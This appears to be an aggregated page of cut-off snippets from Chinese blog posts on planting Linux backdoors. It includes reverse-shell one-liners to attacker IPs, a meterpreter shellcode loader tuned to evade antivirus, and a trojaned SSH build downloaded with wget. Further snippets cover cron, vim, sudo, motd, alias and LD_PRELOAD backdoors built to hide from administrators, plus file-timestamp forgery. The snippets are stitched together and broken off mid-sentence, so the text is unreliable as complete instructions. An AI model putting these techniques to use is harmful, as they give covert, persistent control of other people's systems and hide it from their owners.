---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...2>&1 不用说了,之前已经讲过了 nc -l 127.0.0.1 1234 > /tmp/f 本地监听 1234,并且将结果重定向到 /tmp/f 这里实现的是bind shell,我们希望的是反弹...mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门
之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode...payload : linux/x64/meterpreter/reverse_tcp 生成shellcode use payload/linux/x64/meterpreter/reverse_tcp...Return pointer to shell code function in executable memory return function buf = "shellcode" # linux...xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6" # linux...反弹shell章节就此结束。
所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ?...在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 创建 STYLE.py ?...这回我们再来尝试一下反弹shell ? ?...可以看到成功反弹shell,做到无命令执行,反弹shell ---- 其实我是做了一个相对极端的尝试,在两端有两种路可走 直接在自启动文件写入payload(比如 /usr/lib/python3.5/
msf 中有很多 payload ,我们来看一下可以用来unix 中反弹shell的paylaod 切换到 msf 目录 ....在Ubuntu 16.04 上 awk 命令执行默认命令会失败,我看网络上大家都是用 centos 来进行反弹的;gawk 命令在 Ubuntu 16.04 中并不是默认命令,需要安装,违背我之前的想法...可以看到,想要使用 jjs 来进行反弹shell,那就需要安装java 环境, Ubuntu 16.04 中没有安装java环境 cmd/unix/reverse_ksh ?...mkfifo /tmp/gbiwa; nc 192.168.1.38 5555 0/tmp/gbiwa 2>&1; rm /tmp/gbiwa 参照之前nc 反弹...可以看到执行失败了,原因是 IO 这个库有问题,如果想用perl反弹shell可以参照之前的文章 cmd/unix/reverse_perl_ssl ?
Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份...
No.2 前言 msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧。...页面控制并加了一些其他的功能可以用来管理诸多客户机 这款远控我下载下来用过,并用pyinstaller打包成了exe(缺点是体积太过庞大),惊奇的是,XXX不杀它,然后自己想着其他语言是不是也会这样,于是我用golang写了一个简易版nc反弹...其实Golang还有个执行shellcode的方法是不用内联C语言的,但是我这边测试能接到反弹shell,但是执行命令会直接断开,代码我也贴出来。
bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...&1 2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹
环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...参数 下面以通过 +libcall 调用 libc 中的 system 函数,执行反弹shell 脚本为例 let result = libcall("/usr/lib/x86_64-linux-gnu...函数,执行的是系统命令,那可以通过加一个 & 符号让命令在后台执行 对于反弹shell来说,如果接收反弹shell处未开启监听,会产生报错 2.
反弹shell代码 import socket, subprocess, os; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect...物理机 监听5555端口并获取反弹的shell ? 参考文章: https://youtu.be/kahNGFF2AU8
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...实现的效果是: 劫持了 ls 命令,输入 ls 后可以执行我们的反弹 shell 的命令 ls 命令执行完全正常,用户无感知 劫持了 unalias 命令,使用户无法直接通过 unalias 来解除我们的...ls 别名 劫持了 alias 命令,使用户查看别名列表的时候发现 ls 一直是 ls='ls --color=auto' 在用户退出ssh的时候才会反弹shell(这个我表示不理解,好像情况也不是很统一...后门 ?
二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....使用 bash -i &> /dev/tcp/10.42.0.1 0<&1 同样能反弹一个可交互的shell。...三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。
成功反弹shell 成功获取 meterpreter shell ?
通过本文我们一起来看看Linux如何反弹shell。...实验环境 kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67) 姿势一 bash反弹 首先,使用nc在外网主机上监听端口: nc -lvp 9090.../是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接, >&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件...可以看到远程已经成功反弹到了shell,并且可以执行命令。...姿势四 php反弹 使用php反弹shell,方法如下 。
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...可以看到成功反弹shell 这种反弹方式不会再 crontab -l 中显现 **【notice】 ** 其实我并没有等一个小时,我直接执行了 sudo run-parts -v --report...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
成功获取到反弹shell ,劫持成功。 加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!.../etc/default/motd-news 我们尝试在 /etc/lsb-release 中加入恶意指令 成功反弹 shell ,并且我们可以看到,这个文件中只有一些环境变量。...我们恢复 /etc/lsb-release ,在 /etc/default/motd-news 做同样的实验 一样可以反弹 shell 所以我们在实用部分直接修改 /etc/update-motd.d...shell 脚本本身就有好多代码,如果在其中插入一些隐蔽的指令或者干脆使用上面探究的 source 的方法,其实是很难发现的 插入指令后登录功能卡住 有些场景下,插入我们的指令后出现登录卡住的问题,当然反弹
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
